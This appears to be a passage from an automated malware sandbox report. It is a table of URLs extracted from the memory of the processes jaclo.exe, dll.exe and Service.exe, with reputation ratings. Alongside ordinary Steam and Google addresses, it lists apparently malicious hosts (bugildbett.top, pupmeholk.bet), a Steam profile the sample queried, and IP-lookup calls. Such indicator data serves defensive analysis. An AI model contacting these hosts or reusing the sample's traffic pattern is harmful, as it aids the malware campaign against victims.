dll.exe, 00000010.00000003.1558249415.000000000401B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558094984.0000000004015000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.valvesoftware.com/legal.htm	jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&a	jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.000000000125F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com	dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered	dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/login/home/?goto=profiles%2F76561199822375128	dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com	dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S	jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://avatars.cloudflare.steamstatic.com/fef7K	dll.exe, 00000010.00000003.1471974297.0000000004017000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471755815.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472429859.0000000004018000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&l=engl	jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571451074.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611173934.000000000400E000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://api.ipify.org6	Service.exe, 00000016.00000002.2513052311.000002614254B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397924687.0000000001324000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610800200.000000000127A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571451074.000000000400F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtabv209h	dll.exe, 00000010.00000003.1449202247.0000000004118000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=e	jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611173934.000000000400E000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmp	false		high
https://s.ytimg.com;	dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcD	jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.000000000125F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steam.tv/	dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://pupmeholk.bet/#kK	dll.exe, 00000010.00000003.1495951794.000000000122F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/s	jaclo.exe, 0000000D.00000003.1397924687.0000000001350000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000002.1400600163.0000000001350000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=V4P4q3q732	jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610831890.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611227058.000000000126C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612147123.0000000001255000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612221238.0000000001270000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=sd6kCnGQW5Ji&	jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571451074.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611173934.000000000400E000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://pupmeholk.bet/pLoskaDGcj9wXRZ1	dll.exe, 00000010.00000003.1496127922.000000000401A000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1496471640.000000000402E000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495899437.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1496217135.000000000402D000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523442445.0000000004030000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://store.steampowered.com/privacy_agreement/	jaclo.exe, 0000000D.00000002.1400527279.000000000131C000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000002.1400748087.00000000013C0000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558141720.0000000001250000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471974297.0000000004017000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471755815.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472429859.0000000004018000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471708256.000000000402C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.ipify.org/TH	Service.exe, 00000018.00000002.2512975134.0000026791CB8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/points/shop/	jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	dll.exe, 00000010.00000003.1449202247.0000000004118000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	dll.exe, 00000010.00000003.1496798433.0000000004122000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.ipify.orgInternetOpenUrl	Service.exe, 00000016.00000000.1448891266.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000016.00000002.2513871933.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000017.00000002.2514078323.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000017.00000000.1545689250.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000018.00000002.2513823440.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000018.00000000.1629513187.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe.18.dr	false	Avira URL Cloud: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	dll.exe, 00000010.00000003.1496798433.0000000004122000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/a	dll.exe, 00000010.00000002.1611980427.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1587060011.00000000011C6000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553303136.00000000011C6000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610970478.00000000011C6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sketchfab.com	dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com:443/profiles/76561199822375128	dll.exe, 00000010.00000003.1587060011.00000000011CC000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527625878.00000000011CC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lv.queniujq.cn	dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bugildbett.top/	jaclo.exe, 0000000D.00000002.1400600163.0000000001343000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397924687.0000000001343000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	dll.exe, 00000010.00000003.1497879582.000000000442E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.youtube.com/	dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/privacy_agreement/	jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&l=engli	jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.000000000125F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/imagsM	dll.exe, 00000010.00000003.1471974297.0000000004017000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471755815.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472429859.0000000004018000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/X	jaclo.exe, 0000000D.00000002.1400600163.0000000001325000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397924687.0000000001324000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/	dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=engli	dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, 